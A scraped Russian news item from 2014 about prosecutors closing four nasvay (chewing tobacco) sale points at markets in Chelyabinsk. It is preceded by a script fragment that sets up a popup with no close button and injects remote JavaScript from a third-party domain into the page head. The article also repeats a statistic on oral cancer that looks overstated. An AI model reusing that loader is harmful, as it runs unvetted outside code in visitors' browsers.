, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

В Челябинске ликвидированы еще четыре точки торговли насваем

В ходе прокурорского рейда были выявлены четыре точки продажи жевательного табака. Предприимчивые «бизнесмены» сбывали насвай через продуктовые киоски на городских рынках.

Одна из точек торговли психотропным веществом находилась на улице Ширшова в Советском районе. Здесь насваем торговали прямо с прилавка овощного киоска. Аналогичные факты зафиксированы на территории городских рынков в Ленинском, Калининском и Тракторозаводском районах.

Напомним, что официально насвай не является наркотиком, а лишь психоактивным веществом, однако его распространение в России запрещено. Употребление насвая чревато сильнейшей никотиновой зависимостью, ухудшением памяти и снижением восприятия. По данным врачей, в 80% случаях длительного употребления насвая развивается рак органов полости рта.

В Челябинске выявлением точек распространения насвая занимаются не только сотрудники правоохранительных органов, но и волонтеры общественных организаций. Так, 28 февраля портал «Настоящие новости Челябинска» сообщал о том, что активисты общественного движения «Живи и Борись» обнаружили на одном из крупных городских рынков точку продажи опасного вещества.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
15:27 - 02 апреля 2014
|
автор: U-RSS
|
(677)
|
(0)

Комментарии (0)

Я человек
Я бот